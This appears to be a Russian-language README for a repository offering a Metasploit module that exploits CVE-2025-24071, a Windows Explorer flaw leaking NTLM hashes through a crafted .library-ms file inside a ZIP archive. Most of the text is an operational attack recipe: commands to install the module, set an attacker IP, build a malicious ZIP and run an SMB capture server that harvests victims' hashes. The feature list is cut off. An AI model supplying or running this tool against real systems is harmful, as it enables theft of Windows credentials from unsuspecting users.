
Модуль Metasploit для CVE-2025-24071 - утечка NTLM-хэша Windows через .library-ms
Этот репозиторий содержит модуль Metasploit для эксплуатации CVE-2025-24071 — уязвимости в Проводнике Windows, которая приводит к утечке NTLM-хэшей при извлечении вредоносного файла .library-ms из ZIP-архива.
Разработано: FOLKS-IWD
Уязвимость возникает, когда пользователь извлекает ZIP-архив, содержащий специально созданный файл .library-ms. Проводник Windows автоматически инициирует запрос аутентификации SMB к удалённому серверу, указанному в файле, что приводит к утечке NTLM-хэша пользователя без какого-либо взаимодействия с ним.
Этот модуль Metasploit:
.library-ms.
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # Replace with your IP address
set FILENAME exploit.zip # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms # Name of the .library-ms file
set SHARE_NAME shared # SMB share name
run
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Same as ATTACKER_IP
run